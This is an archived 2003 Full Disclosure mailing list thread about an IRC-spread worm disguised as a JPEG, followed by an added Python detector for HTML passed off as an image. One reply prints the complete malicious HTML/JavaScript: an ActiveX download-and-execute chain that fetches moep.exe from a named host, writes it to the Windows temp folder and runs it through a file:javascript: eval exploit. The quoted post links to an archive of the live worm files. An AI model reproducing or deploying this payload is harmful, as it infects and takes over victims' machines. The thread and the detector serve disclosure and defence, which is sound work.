Full Disclosure mailing list archives
Re: new worm - "warm-pussy.jpg".
From: "segfault" <segfault () nycap rr com>
Date: Wed, 12 Nov 2003 14:36:41 -0500
You idiot. Just because a file is called warm-pussy.jpg, doesn't mean that the webserver it resides on isn't going to parse its actual content (which is probably plaintext). Look again, I'm sure you'll be surprised.

Contents of warm-pussy.jpg:

<html>
<head>
</head>
<body onLoad="doit()">
<p>
<textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","http://vnm.musx.net/moep.exe",0);
x.Send();
s.Write(x.responseBody);
s.SaveToFile("C:\\windows\\temp\\browsercheck.exe",2);
</textarea>
<textarea id="code2" style="display: none;">
md="<object id=\"oFile\""+
" classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
" codebase=\"c:/windows/temp/browsercheck.exe\"></object>";
w=createPopup();
w.document.clear();
w.document.write(md);
</textarea>
<script language="javascript">
function preparecode(code) {
  result = '';
  lines = code.split(/\r\n/);
  for (i=0;i<lines.length;i++) {
    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/"/g,"\\\"");
    line = line.replace(/[/]/g,"%2f");
    line = line.replace(/\r\n/,"");
    line += ' ';
    if (line != '') {
      result += line;
    }
  }
  return result;
}
function weiter() {
  open(myURL,"_search");
}
function starten(thecode) {
  mycode = preparecode(thecode);
  myURL = "file:javascript:eval('" + mycode + "')";
  open("http:///","_search");
  setTimeout("weiter()", 500);
}
function doit() {
  starten(document.all.code.value);
  setTimeout("doit2()", 600);
}
function doit2() {
  starten(document.all.code2.value);
}
</script>
</p>
<p> </p>
<p><br> </p>
<p></p>
<p>
<img src="nice_warm_pussy.jpg" width="640" height="480"><br>
</p>
<p><br> </p>
</body>
</html>

----- Original Message -----
From: "Tom Russell" <kalleth () nildram co uk>
To: <full-disclosure () lists netsys com>
Sent: Wednesday, November 12, 2003 1:34 PM
Subject: [Full-disclosure] new worm - "warm-pussy.jpg".

Manifests itself in an infected victim by saying over IRC (mIRC it seems):

1824.11| [inx-dj|eJ-Kevin] rofl wie geil, gibt euch das :)) http:// vnm.musx.net /warm-pussy.jpg <--- einfach geil !

(spaces added to guard against accidental infection)

It is unknown at this time whether this is another variant of irc.trojan.fgt.

The files used in this worm can be obtained at http://kalleth.2tone-dev.com/fd/warm-pussy.rar in unaltered form - be careful what you do with them. (I take no responsibility for accidental infection.)

Regards,
Tom Russell, 2tone:development (www.2tone-dev.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
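The point of the reply above is that the ".jpg" name says nothing about what the file is; a gateway or scanner has to look at the bytes. Below is an added example (not code from this thread) of that check in Python: it sniffs the leading bytes instead of trusting the extension and flags the constructs the posted payload relies on (ADODB.Stream, Microsoft.XMLHTTP, SaveToFile, a file:javascript: URL, a local codebase= on an object tag). The sample inputs are constructed to mirror the posted file's structure and are not its real bytes; the download URL is a placeholder.

```python
import re

# Constructed sample: HTML served under a .jpg filename, modelled on the
# structure of the posted file (not the original file's bytes).
FAKE_JPG = b"""<html><head></head><body onLoad="doit()">
<textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream"); s.Mode=3; s.Type=1; s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","http://example.invalid/moep.exe",0); x.Send();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\windows\\\\temp\\\\browsercheck.exe",2);
md="<object codebase=\\"c:/windows/temp/browsercheck.exe\\"></object>";
</textarea>
<script language="javascript">
myURL = "file:javascript:eval('" + mycode + "')";
</script></body></html>"""

# Constructed sample: a genuine JPEG header (SOI marker + JFIF APP0 segment).
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 40

# Content markers taken from the posted payload; each one is a step of the
# download-then-execute chain the reply shows.
MARKERS = [
    (re.compile(rb"ActiveXObject\(\s*[\"']ADODB\.Stream", re.I), "ADODB.Stream"),
    (re.compile(rb"ActiveXObject\(\s*[\"']Microsoft\.XMLHTTP", re.I), "Microsoft.XMLHTTP"),
    (re.compile(rb"\.SaveToFile\(", re.I), "SaveToFile"),
    (re.compile(rb"file:javascript:", re.I), "file:javascript: URL"),
    (re.compile(rb"codebase=\\?[\"'][a-z]:", re.I), "local codebase="),
]

def sniff_type(data):
    """Classify a file by its leading bytes, ignoring the filename entirely."""
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    head = data[:512].lstrip().lower()
    if head.startswith((b"<html", b"<!doctype html")) or b"<script" in head:
        return "text/html"
    return "application/octet-stream"

def scan_disguised_image(filename, data):
    """Return a verdict: does the content match the extension, and which
    of the known risky constructs appear in it?"""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = "image/jpeg" if ext in ("jpg", "jpeg") else None
    sniffed = sniff_type(data)
    hits = [label for pattern, label in MARKERS if pattern.search(data)]
    mismatch = claimed is not None and claimed != sniffed
    return {"filename": filename, "claimed": claimed, "sniffed": sniffed,
            "mismatch": mismatch, "markers": hits,
            "suspicious": mismatch or bool(hits)}

if __name__ == "__main__":
    for name, blob in (("disguised.jpg", FAKE_JPG), ("photo.jpg", REAL_JPG)):
        print(scan_disguised_image(name, blob))
```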